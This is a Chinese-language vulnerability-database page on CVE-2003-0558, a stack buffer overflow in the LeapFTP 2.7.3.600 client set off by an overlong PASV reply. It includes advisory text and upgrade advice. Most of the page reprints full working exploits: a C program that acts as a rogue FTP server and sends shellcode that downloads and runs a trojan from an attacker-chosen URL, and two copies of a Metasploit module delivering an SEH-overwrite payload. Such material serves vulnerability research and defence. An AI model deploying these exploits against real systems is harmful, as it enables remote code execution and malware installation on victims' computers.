CVE-2003-0558
CVSS7.5
发布时间 :2003-08-18 00:00:00
修订时间 :2016-10-17 22:35:19
NMCOEP    

[原文]Buffer overflow in LeapFTP 2.7.3.600 allows remote FTP servers to execute arbitrary code via a long IP address response to a PASV request.


[CNNVD]LeapFTP缓冲区溢出漏洞(CNNVD-200308-079)

        LeapFTP 2.7.3.600版本存在缓冲区溢出漏洞。远程FTP服务器可以借助到PASV请求的超长IP地址响应执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0558
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0558
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-079
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105795219412333&w=2
(UNKNOWN)  BUGTRAQ  20030711 LeapFTP remote buffer overflow exploit

- 漏洞信息

LeapFTP缓冲区溢出漏洞
高危 缓冲区溢出
2003-08-18 00:00:00 2005-10-20 00:00:00
远程  
        LeapFTP 2.7.3.600版本存在缓冲区溢出漏洞。远程FTP服务器可以借助到PASV请求的超长IP地址响应执行任意代码。

- 公告与补丁

        

- 漏洞信息 (54)

LeapFTP 2.7.x Remote Buffer Overflow Exploit (EDBID:54)
windows remote
2003-07-12 Verified
21 drG4njubas
[点击下载] [点击下载]
/*
,----------------------------------------------------
;     LeapFTP remote buffer overflow exploit     
;              by drG4njubas \\ DWC Group
`----------------------------------------------------
,----------------------------------------------------
;This exploit works against LeapFTP 2.7.3.600
;running on windows 2000 SP3 russian edition.
;Technical details: When LeapFTP requests IP 
;and port by using PASV command if pasv mode 
;is enabled, it causes the buffer overflow on
;the stack area if server's reply for this 
;PASV request has a long IP address: 
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
;And this buffer overflow can overwrite a 
;Structured Exception Handler on the stack 
;area with an arbitrary value by specifying 
;the address data over 1057 bytes. If this 
;reply contains 0x29 and 0x2E bytes, an 
;exception occurs before Structured Exception
;Handler is overvritten and program continues
;it's normal work. Thanks a lot to RaiSe for 
;his wonderful shellcode.
`----------------------------------------------------
*/

#include<winsock.h>
#include<stdio.h>

void main(int argc, char *argv[]){

printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
printf("; www.dwcgr0up.net ;\n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n");

if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>\n");
printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
return;
}

char exploit[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2d\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65\x08\x68"
"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25\x49\xE1"
"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE\x83\x25"
"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x31\xFF\xFF\xFF"
"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34\xFF\xFF"
"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB\x37\xFF"
"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80\xAB\x3A"
"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03\x80\xAB"
"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF\x03\x80"
"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF\xFF\x03"
"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF\xFF\xFF"
"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48\xFF\xFF"
"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB\x4B\xFF"
"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03\x80\xAB"
"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF\x03\x80"
"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF\xFF\x03"
"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF\xFF\xFF"
"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C\xFF\xFF"
"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB\x5F\xFF"
"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\xFF\xFF\xFF\x03\x80\xAB\x62"
"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03\x80\xAB"
"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF\x03\x80"
"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF\xFF\x03"
"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF\xFF\xFF"
"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70\xFF\xFF"
"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB\x73\xFF"
"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80\xAB\x76"
"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03\x80\xAB"
"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF\x03\x80"
"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\x80\xAB\x7E\xFF\xFF\xFF\x03"
"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x81\x03\x80\x6B\x82\x03\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x61\xF9\xFF\xFF";

char *url = argv[2];

if(strlen(url)>80){
printf("ERROR: trojan url is too long!\n");
return;
}

for(unsigned int i = 5; i < strlen(url); i++){
url[i]+=3;
exploit[839+i] = url[i];
}

exploit[839+i] = '\x0B';
exploit[839+i+1] = '\x04';

WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);

SOCKET listen_Sock = socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;

addr_Sock.sin_family = AF_INET;
addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
addr_Sock.sin_port = htons(atoi(argv[1]));

printf("Awaiting for connections...\n");

if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
if(listen(listen_Sock, 1))return;
SOCKET victim = accept(listen_Sock,NULL,NULL);
printf("Victim connected...\n");

char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
send(victim, buffer, strlen(buffer), NULL);

while(true){
if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
if(strncmp(buffer, "USER", 4)==0){
sprintf(buffer, "%s\r\n", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)==0){
sprintf(buffer, "%s\r\n", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)==0){
sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)==0){
sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)==0){
sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)==0){
sprintf(buffer, "%s\r\n", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASV", 4)==0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.\n");
break;
}
else{
printf("ERROR: Wrong client or pasv mode is not enabled.\n");
break;
}

}

closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
}

// milw0rm.com [2003-07-12]
		

- 漏洞信息 (16708)

LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow (EDBID:16708)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: leapftp_pasv_reply.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600
				client that is triggered through an excessively long PASV reply command. This
				module was ported from the original exploit by drG4njubas with minor improvements.
			},
			'Author' 	 => [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2003-0558' ],
					[ 'OSVDB', '4587' ],
					[ 'BID', '7860' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/54' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\().,",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK.
					[ 'Universal LeapFTP.exe', 	{ 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe
					[ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
					[ 'Windows XP SP0 English',	{ 'Ret' => 0x7660139c }	], # p/p/r cscdll.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 09 2003',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
				OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)

		buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
		client.put(buffer)
	end

	def on_client_data(client)


		client.get_once

		# This could be improved if anyone wants to write a FTP server API.
		user = "331 Please specify the password.\r\n"
		client.put(user)

		client.get_once
		pass = "230 Login successful.\r\n"
		client.put(pass)

		client.get_once
		syst = "215 Windows_NT 5.1\r\n"
		client.put(syst)

		client.get_once
		rest = "350 Restart position accepted (100).\r\n"
		client.put(rest)

		client.get_once
		rest = "350 Restart position accepted (0).\r\n"
		client.put(rest)

		client.get_once
		pwd = "257 \"/\"\r\n"
		client.put(pwd)

		client.get_once
		type = "200 Switching to ASCII mode.\r\n"
		client.put(type)

		client.get_once
		port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first.
		client.put(port)

		client.get_once
		pasv = "227 Entering Passive Mode ("
		pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << ")\r\n"

		client.put(pasv)

		handler(client)
		service.close_client(client)
	end
end
		

- 漏洞信息 (F83033)

LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow (PacketStormID:F83033)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit,overflow
CVE-2003-0558
[点击下载]

This Metasploit module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This Metasploit module was ported from the original exploit by drG4njubas with minor improvements.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600
				client that is triggered through an excessively long PASV reply command. This
				module was ported from the original exploit by drG4njubas with minor improvements.
			},
			'Author' 	 => [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2003-0558' ],
					[ 'OSVDB', '4587' ],
					[ 'BID', '7860' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/54' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\().,",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
				# Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK.
					[ 'Universal LeapFTP.exe', 	{ 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe 
					[ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
					[ 'Windows XP SP0 English',	{ 'Ret' => 0x7660139c }	], # p/p/r cscdll.dll 
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 09 2003',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
				OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)	

		buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
		client.put(buffer)
	end
	
	def on_client_data(client)
	
	
		client.get_once
		
		# This could be improved if anyone wants to write a FTP server API.
		user = "331 Please specify the password.\r\n"
		client.put(user)
		
		client.get_once
		pass = "230 Login successful.\r\n"
		client.put(pass)
		
		client.get_once
		syst = "215 Windows_NT 5.1\r\n"
		client.put(syst)
		
		client.get_once
		rest = "350 Restart position accepted (100).\r\n"
		client.put(rest)
		
		client.get_once
		rest = "350 Restart position accepted (0).\r\n"
		client.put(rest)
		
		client.get_once
		pwd = "257 \"/\"\r\n"
		client.put(pwd)
		
		client.get_once
		type = "200 Switching to ASCII mode.\r\n"
		client.put(type)
		
		client.get_once
		port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first.
		client.put(port)
				
		client.get_once
		pasv = "227 Entering Passive Mode ("
		pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << ")\r\n"
		
		client.put(pasv)
		
		handler(client)
		service.close_client(client)
	end
end
    

- 漏洞信息

4587
LeapFTP PASV Reply Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Uncoordinated Disclosure

- 漏洞描述

A buffer overflow exists in LeapFTP. The server fails to validate IP addresses passed via the PASV command resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-06-08 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.7.4.602 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站